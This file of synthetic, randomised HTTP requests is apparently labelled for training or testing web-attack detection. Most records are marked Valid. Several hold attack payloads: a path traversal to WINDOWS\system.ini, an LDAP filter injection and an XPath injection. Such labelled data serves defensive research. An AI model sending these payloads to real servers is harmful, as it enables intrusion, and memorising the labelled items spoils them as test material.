Trailer: If-Match
User-Agent: Mozilla/9.5 (X11; U; SunOS sun4u 2.8; mo-iC; rv:2.5.1) Gecko/54128023
UA-CPU: Sparc
UA-Disp: 147,1254,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4598x3959
Via: hsonl/9.7 172.25.173.253, 5.2 www.eoiea.jpeg:00191
Transfer-Encoding: compress
Upgrade: nn8pot/0.1, 8Rn/0.5
Warning: 782 1.21.166.132 "ddoam8pa2ee" "Mon, 28 Jun 04 14:04:38 UTC"
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 4904494617
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 9370
Start - Id: 6399
class: Valid
POST /88sel/5yJNK96H-WCZs2DzB6UZ/xe3detpszkis5/tauEeeiiNs1foTneerfn/bbEbEtaee/iDiu/Dr1aeka7larugre7qsr.pl? HTTP/1.0
Content-Length: 16
Content-Language: rp,1leand,s
Content-Encoding: gzip
Content-Location: http://eto9.com/elwas/8erVenf/3pit.pdf
Content-MD5: cnRuTmFzMm9lRWVsNGhteA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Sep 05 06:40:59 CET
Last-Modified: Mon, 19 Oct 09 02:37:09 CET
Host: www.3bflnlpsnb.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-15
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 55.9.189.77
Cookie: tdtcnrz4e=eehts+ogp;lt=iematoIn6mQml;igtinmar=hftmNO
Cookie2: $Version="6"
Date: Wed, 19 Apr 06 17:51:41 UTC
ETag: W/"Y1PbMR02h9TYZ9t@EI"
Expect: 62ec
From: dl4sbEq@atsb.fr
If-Modified-Since: Sat, 17 Jun 06 17:06:59 GMT
If-Unmodified-Since: Mon, 15 Feb 10 07:02:44 CET
If-Match: "4UaXNTyy@c5WbN0Jn"
If-None-Match: "qXriyl312j4mos7kV"
If-Range: *
Max-Forwards: 04
MIME-Version: 4.1
Pragma: aGhh='ioeei'
Proxy-Authorization: Digest nc=A75dbFB1
Authorization: NTLM Z2Vsd2ltb1F4dXRzOWh1QWRNcmNNYTBEZGdlc0FiZ2F1b3JlaXRhcnRrbnJl
Range: -46641,596587-2635,975-1
Referer: /ekreciwd/oojcoolh/pibc.gz
TE: trailers,chunked,trailers
Trailer: Accept-Charset
User-Agent: loia (l3whMq; htANJNNHM6; tuOAvt; 8oTMs8G-2; tLQU50D4E)
UA-CPU: 68000
UA-Disp: 131,664,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4815x4543
Via: 8.8 www.hnea.jpeg, FTP/8.6 66.169.93.193, 1.1 65.84.86.8
Transfer-Encoding: compress
Upgrade: wnlseg/9.9
Warning: 092 25.253.148.164 "1r7defgs" "Mon, 19 Nov 07 22:00:11 UTC"
X-Forwarded-For: 249.70.40.54
X-Serial-Number: 10020198390
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

T_JlAe=2lesa7lno

End - Id: 6399
Start - Id: 10176
class: Valid
GET /.NobgsoundwsnpWJYZ/10X4zJ/e1hh.cfm?acCh7lzsoltrem=5708 HTTP/1.1
Host: 123.202.80.36
Connection: annnr
Accept: */*
Accept-Charset: iso-2022-kr;q=0.8, us-ascii
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 206.184.127.225
Cookie: ocoI2inn3s4f3=ygOn0gnpscgnr
Cookie2: $Version="50"
Date: Sat, 19 Jun 04 19:03:50 CET
ETag: W/"RB0Ulkg5F0E9CcvlO"
Expect: 100-continue
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Mon, 10 Sep 07 03:02:51 GMT
If-Unmodified-Since: Mon, 01 Nov 04 04:55:17 CET
If-Match: *
If-None-Match: *
If-Range: "Nj6GXO88oTMQc1kfQXA"
Max-Forwards: 26
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic dG9vaWpuOjlpajByclJ0
Range: -56
Referer: http://www.ysinS.be/xovna.msf
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/5.7 (Windows; U; Windows NT 0.1; ju-nn; rv:0.0.4) Gecko/08665723
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: 0.3 www.eksss.shtml
Transfer-Encoding: identity
Upgrade: imhr/0.1, n6leen/2.1, iPhT/4.2
Warning: 842 www.ktzeHh.shtml "eDtsrAi" 
X-Forwarded-For: 104.138.147.78
X-Serial-Number: 87261
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10176
Start - Id: 22994
class: Valid
GET /qwhere6PMqThG1CJ/sPyNGAcoL/0_177FkKN/6e/xnmtRjseaatujRtja7e/vLFMZ8Wfu/Vv4ucdyoR/eeDtapuiyesEtq1gt/iw0qsy/iin1sYyvicih.asmx?tne4o=ypV&ZQsFLQ=tr9def1&sr=886&keieptiR8ltf=xnpasswd%29&ih=lp9lp_&Nj4omdPvxcn1f6=cnmswp-%3E&WPIAv=%7Elnand&iacfoeRtonaad=aNtmta%40en&Ux-nullDs=qe76 HTTP/1.0
Host: www.hfnydcOa.org
Connection: close
Accept: */*;q=0.1
Accept-Charset: isiri-3342, utf-8;q=0.8, macintosh, cp-936;q=0.0
Accept-Encoding: compress, deflate, identity;q=0.1
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 84.81.179.39
Cookie: eolhBsgtau4ht=3sFe;mgO=a
Cookie2: $Version="83"
Date: Tue, 10 May 05 12:55:04 GMT
ETag: "_0gV7NM8NyRumOR6klMt"
Expect: 0fssgi
From: pesd@at4tios7ee.ch
If-Modified-Since: Sun, 18 Feb 07 06:41:45 UTC
If-Unmodified-Since: Thu, 08 Jun 06 10:54:15 GMT
If-Match: "eaMoMaKr5-RiFsneNwvo"
If-None-Match: *
If-Range: "GvYt3vTdxj@CP_Ry"
Max-Forwards: 6
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: fmr5 Ld67ld=n9o0r
Authorization: Digest cnonce="oeucsyh0"
Range: 524874-69455
Referer: http://anru.org/aflr/ieeWe88a/pyali/oo93fs2g/duxsooy0.bin
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/8.3 (compatible; MSIE 5.6; Mac OS X; oaa2t; uCe4iw; hvnhgyhoR)
UA-CPU: 68000
UA-Disp: 052,5191,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 465x0327
Via: 4.2 180.255.61.20
Transfer-Encoding: identity
Upgrade: bae/0.4, hee6y0/8.7, soqh/2.5, sdle8/1.8, bdseN/0.5
Warning: 183 169.73.238.29 "ettes1Theraatk2r3Re" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 91483832
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22994
Start - Id: 24120
class: Valid
GET /cGd/tARXOVQWdCMEvD2RYxW5/egzrEYqwpVM/cd0diaiC40-M/iE-oRd58he/6k/p6GabKdj5sAbqY7Qm5_o/krtKoSOZ5DS8m/d1.-sHLBT5Q2oFs_Yh/dtlzdsbsp0is/teolo1aaettg7d3jY.jsp? HTTP/1.1
Host: www.aolochefx.org:559
Connection: keep-alive
Accept: audio/x-wav, video/quicktime;q=0.0, image/jpeg;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: A-cenLh
Cache-Control: no-store
Client-ip: 161.43.125.4
Cookie: elrrt=eedDenfxhoe2Hstdinh;oaLBhLuS=W;nksattlvew3ct=bnrNNkWt;nHx=23;ixesltatNni7y=le5=ofVezi2z2meta
Cookie2: $Version="9"
Date: Sun, 15 Oct 06 13:53:07 CET
ETag: W/"csn8IelteXHYnWTqdNm"
Expect: 100-continue
From: teocayH@bcantyn.net
If-Modified-Since: Sun, 30 Dec 07 20:07:45 UTC
If-Unmodified-Since: Tue, 22 Apr 08 16:48:45 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 25 May 04 14:18:02 GMT
Max-Forwards: 394
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: rephn 9uuqEn=draec
Range: -293,9-
Referer: /8noshdn.png
TE: trailers
Trailer: Trailer
User-Agent: rmaf/1.3
UA-CPU: StrongARM
UA-Disp: 3355,078,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 109x7677
Via: HTTP/9.3 www.dd3r.js, 3.6 80.39.173.17, 8.5 www.ehnGshaa.css
Transfer-Encoding: compress
Upgrade: hlnn4/1.8
Warning: 382 www.ni2t.htm "ztadtttA6sydiidea" "Fri, 07 Jan 05 08:48:11 CET"
X-Forwarded-For: 33.216.101.183
X-Serial-Number: 98139157905
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24120
Start - Id: 32418
class: Valid
GET /..4G0objectstdinHdmetaDhLow/Guovbscriptj7_2xV_copy9/npnrao6y/t73Gkc36frfVv4oe.S/zP/b@uj4D2/rPllFRC4jSGl/72Q_e/onvriu3W/uqe4otahwod.mspx? HTTP/1.1
Host: www.Nuioeh.be
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: gzip, identity, deflate;q=0.5
Accept-Language: s3bboa-cl7aCtr7
Cache-Control: no-transform
Client-ip: 183.35.15.71
Cookie: c03=44500;tmNslt2cu4tth=hdwerosnerN;thieiRadr0heOl=etnajs&ll]c;snl=pthijicnvrgcreE9s;io3hIa=6 tl1xisofa uae;xscoz=hm
Cookie2: $Version="1"
Date: Thu, 10 Mar 05 10:28:34 CET
ETag: "oB4UAP3aCLriMMU2m"
Expect: 6mBomo
From: releg@syoCrleekk.net
If-Modified-Since: Mon, 26 Oct 09 09:25:37 UTC
If-Unmodified-Since: Fri, 20 Aug 04 01:58:20 GMT
If-Match: *
If-None-Match: *
If-Range: "UoLBQ7pQHOe-avob3sgn"
Max-Forwards: 5
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: riast tqseqm6g=ayomhio
Authorization: NTLM Y3l3ZWN6Z25iZTRhaXJpZWh3U241bE9pYVllcmF2YWMxbg==
Range: -9,-9053,093-28
Referer: http://tkbvie.biz/0jIhi.jsp
TE: deflate,gzip;q=0.8
Trailer: If-Match
User-Agent: gjNjMqg10 http://www.toerlr.ch
UA-CPU: MIPS
UA-Disp: 7145,6642,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5662x6161
Via: 5.9 www.oeuCtoe.gif
Transfer-Encoding: compress
Upgrade: wrt/4.4
Warning: 286 www.NaiYvg3.css:98360 "iondiidelgzicr0rouen" 
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 32097
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32418
Start - Id: 45789
class: PathTransversal
GET /a-qyXxnjGRTSAihu/sURFLnQx/ittynsKaopn/Odvsnfee.png?DwCzzlmerEtehu=kieihsaae%5D&smeetmtcsgsJ=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&irxpngeHewse=hucg9Aua+6hy&Ald3=saeK&Fh=linputiehttpsdivq&iIdiN=0rbupdatedavarnoden&ttpcsaotlo=195537&1ihns0eai5=a%2Fr0o&einjer=3&eslltenashwhdl=elteyu&cmd2node7B9DP=93353&90ctrn=eas&nwBisYAexT=419729&mTxgroup by01window.openZ=sty HTTP/1.1
Host: www.bqhs1Ea3Hk.org:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: ks_c_5601-1987;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 40.147.120.92
Cookie: 66tyb=639;0AiframedeIh8usrZ9=6;p9aef0odseanh6o=erU
Cookie2: $Version="269"
Date: Tue, 06 Nov 07 15:49:40 GMT
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: 100-continue
From: rsj6lTrn@Ezll0rry.ch
If-Modified-Since: Fri, 15 Aug 08 10:56:09 UTC
If-Unmodified-Since: Tue, 19 Jul 05 15:42:05 CET
If-Match: "t8h3cLXFjjLAGKJ"
If-None-Match: "tm2vALpcmhbfa@eOmu"
If-Range: *
Max-Forwards: 5873
MIME-Version: 2.9
Pragma: Bihebek=odi0ia
Proxy-Authorization: attk esmu5=OSiF3tt
Authorization: Basic b3RtbE9vdzp0aWh0YQ==
Range: 855-
Referer: http://mdiwra.ch/wijo/foots.sh
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: a1oQe5G3 http://www.slui3l.biz
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9422x259
Via: 0.2 www.uoca.png, 7lnif/6.2 97.207.77.109, 4.8 www.gsrfm.js
Transfer-Encoding: tieim; tened7e=alw8x9
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 231.162.6.186
X-Serial-Number: 06918680418533
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45789
Start - Id: 18216
class: Valid
GET /mhnijtmn/d4M155sLUY_Phy1/tMO.mspx?ahaons0br=81514&n6isqisswEt3awd=nautoexec%7En&iss=ndc HTTP/1.0
Host: 164.190.70.19
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 18.171.181.243
Cookie: intnnLweraec=eic;wEKDiutfantttn=\TtAbdgni
Cookie2: $Version="251"
Date: Sun, 11 Apr 04 10:16:34 UTC
ETag: W/"kbsG2wxTIYHzOzT-h"
Expect: shsz
From: 1rhtah@f5rw.de
If-Modified-Since: Fri, 03 Dec 04 12:52:47 CET
If-Unmodified-Since: Wed, 23 Nov 05 18:29:26 UTC
If-Match: "a-UpP4DP8B.sUFU_Ymhe"
If-None-Match: ".9gWcaT6bYNsYp85d"
If-Range: Sun, 03 Aug 08 13:25:04 CET
Max-Forwards: 781
MIME-Version: 0.5
Pragma: rRde=3r
Proxy-Authorization: udkE o8jpteaz=eet8ehdn
Authorization: NTLM aXNhY29lYW90T3JvaXQyTWhlcmF6ZWV0N2U5dG5iczl0UmU5NnJybw==
Range: 27-4,-74
Referer: /Eaa8a0.wav
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: aehnqb (rlzjESeM)
UA-CPU: MIPS
UA-Disp: 202,576,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 810x317
Via: 2.0 www.vwr8r.tiff, o6ag/5.1 www.eedloi.shtml, FTP/2.7 63.202.35.239
Transfer-Encoding: identity
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 8413753908190
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18216
Start - Id: 21464
class: Valid
GET /4disse/o811av9vlCOxW9r/YUcGZlr/ogp2jsitgctgfezs4/zrH11zJDbbW8wpSyAB/al73OWU0sIab/P089b/sy3.mPhWF/p5orxt7u/echokU.orjFCZ/stetioiEwpa/iwdeaynaetnOayat.jsp? HTTP/1.1
Host: www.aysY0e.fr
Connection: gL0rfy
Accept: video/quicktime;q=0.0, video/quicktime, text/*
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.9, deflate, gzip;q=0.6, identity;q=0.4
Accept-Language: *;q=0.7
Cache-Control: min-fresh=59895
Client-ip: 70.74.65.196
Cookie: trkyt3iitttnyea=rIOhtaccese9b;7efvtienqfeios=+ndat;gnpentrnhuo7ne=sao;Gyjps5mGs5=hrG--zB6mnBd
Cookie2: $Version="0"
Date: Tue, 26 Sep 06 18:24:25 UTC
ETag: W/"Y.O-0uEW4tNzrNYwA"
Expect: tdoie5=saOtcG8;uimu3tdE=leindd
From: eeao@3rhoo.be
If-Modified-Since: Wed, 12 Oct 05 04:06:03 UTC
If-Unmodified-Since: Sun, 15 Aug 04 22:17:42 CET
If-Match: *
If-None-Match: "fJ4JULwIA9lMJXjnybE"
If-Range: Mon, 28 Feb 05 19:50:49 GMT
Max-Forwards: 19
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic eTNjOWh0azo4c2luaWRy
Authorization: Digest algorithm=mnen
Range: 396297-94713
Referer: http://a6rnagg.com/iohk/rRs5s4.js
TE: chunked;q=0.2
Trailer: From
User-Agent: Mozilla/9.6 (X11; U; Open BSD i386 8.2; tA-h6; rv:8.1.3) Gecko/46820587
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 887x6118
Via: 3.3 www.adinw.shtml:7911
Transfer-Encoding: ei41n; nqti=dnmdo1
Upgrade: aE4/5.1, aNco/7.8, nenln/5.7
Warning: 502 www.le6w08da.jpeg "cfeinF" 
X-Forwarded-For: 58.196.148.222
X-Serial-Number: 53165421880572
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21464
Start - Id: 38665
class: LdapInjection
GET /rD2uftenst/tcoiteiwvEee/oA8i/weisTstmeeieseeeo/s9u7cm@@tFRxb5f/EbeosqaNojdzt6lft98a/e8F5bjA-.axhUSw.js?yc7lm=tUmV6fBrFvbm&hReeui5t0=rgTswTQO&seiog=ekiUtTCQQokc&Sr18doV=5%3A0childl&rdOyaaI=nShN2&4c=gt&o8troaswynb=05275595&ionessmaolg=646448&Ytsean=eostepjeeh&r9whfteetmo8e1=4im%29%28%26%28objectClass++%3D+++ao*%29 HTTP/1.0
Host: 209.194.107.210:6
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 4.62.251.210
Cookie: jstnlrs7hrdl=Ilza ed p9Seta;umhaa2= o@c]ett;ARral=6;rsshirnNthk2en=ehecz8g%+;phesWiedveamB=12720541;uAyteo=748
Cookie2: $Version="129"
Date: Tue, 26 Oct 04 14:24:46 GMT
ETag: W/"O9@O-jxY9.LjYLQO"
Expect: sztaie94
From: 0dbnE@pDEweao.biz
If-Modified-Since: Mon, 13 Dec 04 18:14:55 CET
If-Unmodified-Since: Tue, 16 Jun 09 22:18:01 CET
If-Match: *
If-None-Match: "NeoD1gfKW@JvORts_pF"
If-Range: "zYW1-9b-.SPTKEB"
Max-Forwards: 41
MIME-Version: 9.7
Pragma: no-cache
Authorization: NTLM ZWdkOG1ubmxpZXNiZWVOcmRPaWNldFRua29zb25lc2Y=
Range: -3789,-5,300-00360
Referer: http://www.ur2jAa.gov/siomenu/mveqhi/leREkt/rsfwssr/ne13tsEd.ace
TE: gzip,trailers,trailers
Trailer: Upgrade
User-Agent: eet8eNat/9.8.4
UA-OS: Solaris
UA-Pixels: 7709x7356
Via: 2.8 www.zttowi.css
Transfer-Encoding: gzip
----: -------------------

null

End - Id: 38665
Start - Id: 48753
class: XPathInjection
GET /n8.jsp?iu1atadvQTaa=56786038&hdoarrs2neo=51ze%2Fb&olEsoicsntzteH=3498&JR7z1ij0c=triyiitjeibmet&ukfeIwusmiy9a=netcate&zectrmesGcga=sxu%27+or++%28i+++%3C+++count%28r5s%2Fchild%3A%3Atext%28%29%29+++++and+++j+++%3C+count%28UlojAo%2Fchild%3A%3Acomment%28%29%29++and+++++k+%3C+++++count%28tetwu%2Fchild%3A%3A*%29++%29++++or+%27n9sn%27++%3D++%27++qycb%27+++++or&43t=35497904&xpxsvirtcfagc=533335&fEanna=4618598&i8HwnehIeohyca=1&CaT8=2997284 HTTP/1.1
Host: 198.236.69.28:1182
Connection: teHt
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: weknr-edTYg
Cache-Control: no-transform
Client-ip: 37.213.163.205
Cookie: 3YOhupdatesqarLZ=ee texrlSOoHvd;trGr0stdp=eid1
Cookie2: $Version="094"
Date: Thu, 12 Jul 07 22:56:24 CET
ETag: W/"UE8zeFk_uitRh5X7DiJ-"
Expect: 100-continue
From: 2thchRa@mEq7atat.cz
If-Modified-Since: Mon, 17 Jul 06 04:05:22 GMT
If-Unmodified-Since: Sat, 18 Sep 04 02:51:31 GMT
If-Match: *
If-None-Match: "vul-SnuSJuwDJ@dJU"
If-Range: "gej4gF6yO.Xbhg4"
Max-Forwards: 779
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://is55.st/Tmradind/rpos/lestr.pl
Authorization: Digest nonce
Range: -9
Referer: http://www.pqoeh.biz/csgoto/ghi8/ssefiift/ahgca.cgi
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: sOtnre
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: ntl/9.4 www.4T1g3erb.htm, FTP/0.0 www.tiRJcs.jpg
Transfer-Encoding: compress
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 303 90.249.48.25 "nehmlsj3aoo" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48753
Start - Id: 14896
class: Valid
GET /bl5YP-JU0/qso/ny-qL/p7QCZ/LL865anc3ylogDY1/Z_ysJ/G9qg.tiff?0ah=tst0gf%7E+&mec6lAEofmn=00&dBse3nfiirme=neiii&9stt=ltkihd&fn3sd=28130449&nnai=lzXMPk%40K&asde=tdqstt%5C%3Ed&cwbhe=104&tudy=c6Naea&Trra1bdei7a=5&eraepvEbrnosb=6&eeaOn4qlsdzsirT=mlxLtxga35ne&tbSiloje=7&oh=1143&c5iprm=6tE88 HTTP/1.1
Host: www.u1Bt.uk
Connection: close
Accept: audio/x-wav;q=0.3, video/mpeg, video/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity, gzip, identity;q=0.5, deflate;q=0.9
Accept-Language: Mhi-2eka;q=0.9
Cache-Control: min-fresh=58667
Client-ip: 199.117.134.44
Cookie: e6ecolhgtctt=  
Cookie2: $Version="82"
Date: Mon, 15 Feb 10 24:42:40 UTC
ETag: W/"xFPiTrGwEcsWJKzn7"
Expect: lziantcs
From: 09ujate@anp8ehmeue.biz
If-Modified-Since: Sat, 09 Jun 07 13:53:45 UTC
If-Unmodified-Since: Wed, 23 Jul 08 12:50:17 UTC
If-Match: "bENL25l1IoohnsMZ-DJr"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXhpZXN1ZWdxZXR1OW5lZXJhYWFraVp1dXBzYWhlZG53bGRyb2Zm
Authorization: 8arok qv5onc=oOsc
Range: 614-,0-6202
Referer: http://www.eogyT.it/tteIck/igNn5otp.aspx
TE: gzip;q=0.2,gzip
Trailer: Cache-Control
User-Agent: Mozilla/8.6 (compatible; stoemG9w; Windows NT; oetr; qhi1; ddaeuxH)
UA-CPU: 68000
UA-Disp: 3105,545,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6967x560
Via: 4.5 109.192.188.223, FTP/0.7 www.a1gsWe.css, 5.2 168.254.65.86
Transfer-Encoding: enoltt; mlDint=nfjssah
Upgrade: ed3tT/7.9, 3Ifeie/2.1, etw/3.8, thenvr/4.1
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14896
Start - Id: 27196
class: Valid
GET /gsYD3L/eqYFI9tZlx2@M/dK6htTSFgc/eoAehr/nkse9ritMZaeY1.tiff? HTTP/1.0
Host: www.aoNrtTs.net
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-arabic, windows-1252, cp-936;q=0.0
Accept-Encoding: identity, gzip;q=0.2, compress
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 136.58.92.207
Cookie: oe3YtmpM0=gagtpmDhttpsrwsms3t;sr3=ddOvAhBhONw
Cookie2: $Version="818"
Date: Wed, 06 Sep 06 13:41:21 GMT
ETag: "v6laF5Qbp0MAbwY2Um"
Expect: xped9b5l
From: nseo2sh@tNat6ef8to.be
If-Modified-Since: Wed, 23 Feb 05 03:53:26 GMT
If-Unmodified-Since: Thu, 18 Oct 07 07:52:05 CET
If-Match: "i9Vo_4W3KlM62gQh"
If-None-Match: "U_cX7QIKtSG.luiF"
If-Range: Tue, 20 Jun 06 18:04:33 UTC
Max-Forwards: 9
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: Basic c2JxbmU6bndvaXU=
Range: 699285-,85178-1
Referer: http://murne5c.it/aaEs/bltarea/ihdahhr/tyog/aQrbt.jsp
TE: trailers
Trailer: Connection
User-Agent: mieIas (tVguYZyR; i2M2Fx; cl3mQTFuE5; 3u2@1Fa)
UA-CPU: x86
UA-Disp: 451,9242,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3319x950
Via: HTTP/4.6 www.rovq.gif:0, HTTP/9.3 213.132.249.172
Transfer-Encoding: gzip
Upgrade: Etiah/8.1, hsg/1.5
Warning: 205 www.ei0rwv4l.html "chsie5ekaqdatn" 
X-Forwarded-For: 202.203.219.213
X-Serial-Number: 437437535
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27196
Start - Id: 27884
class: Valid
GET /kNqL/xoooczbla/hOWeMcLX/e0Is65Vac@bw0Xy/@wAl4QQwopengAcbody/sXRJ3Vg9U4p8Sk/nhmBzNsFPxK5y0_jO.msf?u1gracgmonyh=%5Bo%27location&anotl1urnseham=s4KokB&nresstetP0zo=ues&iOhhn4sglexj=%7CaotN4&ecnhnsate=ewh6F&naop=feea6qaetcmailbgohconnecterti&eaea=7 HTTP/1.0
Host: www.mvtr.gov
Connection: fETenee
Accept: text/*, video/*, image/*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: aetxo-hraew, ktk-e, dnt-esfrin7;q=0.4
Cache-Control: only-if-cached
Client-ip: 218.21.80.173
Cookie: zzmee1Ae=g3al84rDg7;4sh4eEgr6mt=90zd
Cookie2: $Version="9"
Date: Fri, 16 Jul 04 01:32:19 CET
ETag: "3bi8TVg5_pidMUIy"
Expect: hdrtkeu
From: naOe@fsh5cXZ.uk
If-Modified-Since: Sat, 04 Mar 06 23:18:42 CET
If-Unmodified-Since: Wed, 10 Nov 04 18:04:22 GMT
If-Match: "2QyFT29b6@rL0zPgH"
If-None-Match: "KP5EZW@g2hMxDB0"
If-Range: Sat, 28 Oct 06 23:25:01 GMT
Max-Forwards: 9858
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM b0VoYXhubGVlYWZSdG5uZTdnQW4ydGl0Y3NobnIyZWVp
Authorization: nmsis apcs=bees5
Range: 025053-,-37375,72-
Referer: http://ele5e9.org/ugwntnsh/nuoUc/ioao/peioRwuf/gxoehU.html
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 0.5; wN-tp; rv:3.8.6) Gecko/08464128
UA-CPU: x86
UA-Disp: 3738,726,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 869x220
Via: 1.0 63.107.198.196
Transfer-Encoding: gzip
Upgrade: nen/9.1, a8m/4.8, eeIy/6.6, o06on/8.4, 6jt5s/6.6
Warning: 179 www.snrm.css "8ebbnsessuhaeisimedl" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 8614528725280
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27884
Start - Id: 15254
class: Valid
GET /twd33C0pr8/ioblAce/etelpn3MmJvaatudnjQ/FF7/52Sgh/hsuotT0sob/vOncteiasoeggdt5/alstdindmtpassthruE.-/VvhavingZ/ReeefaaeeUtrmrl/o8htsoxJeu.shtml?6Sscenkmrh=64776&n96qiiaidis8a=cmkI%40fO7&dexeSha=p5a%40&Wmxdeletee.Gh=cEd.5&wiQh=trsdhea0i&iatoeaceotind=23568061&Et0p=wVWiXPzcj HTTP/1.0
Host: www.gEa1oes.be:80
Connection: heu3
Accept: audio/*
Accept-Charset: x-mac-arabic, iso-8859-2, x-mac-japanese;q=0.8, x-mac-ce;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: o4='qR3r'
Client-ip: 185.107.95.225
Cookie: OdropRoFTstdinB=uiZXs8tAq2fa;nsbisSkny=5;ne93uge9Oi=tLNOC042yJ;yDlink4winnt=enseeTa5o?>g;pl=6666
Cookie2: $Version="9"
Date: Thu, 18 Jun 09 02:12:15 CET
ETag: W/"IpAfcn_weU9-sG3ysE"
Expect: 8oNm=hcoe0
From: aecg@hens.de
If-Modified-Since: Sun, 29 Mar 09 23:05:59 UTC
If-Unmodified-Since: Sat, 18 Dec 04 14:39:32 UTC
If-Match: *
If-None-Match: "I6G1xJTkpdqwky@"
If-Range: Thu, 27 Dec 07 19:44:39 GMT
Max-Forwards: 521
MIME-Version: 3.7
Pragma: 9tcCmh='hnko3s'
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: NTLM c3Npa2hlZWhhaTFoQXVBd2VoNmVsb210eGV1YWF3aGVkc2lz
Range: 70862-
Referer: http://www.senatvo.cz/tnaaTt/Igc7lr/aibiS/pge0mIie.jsp
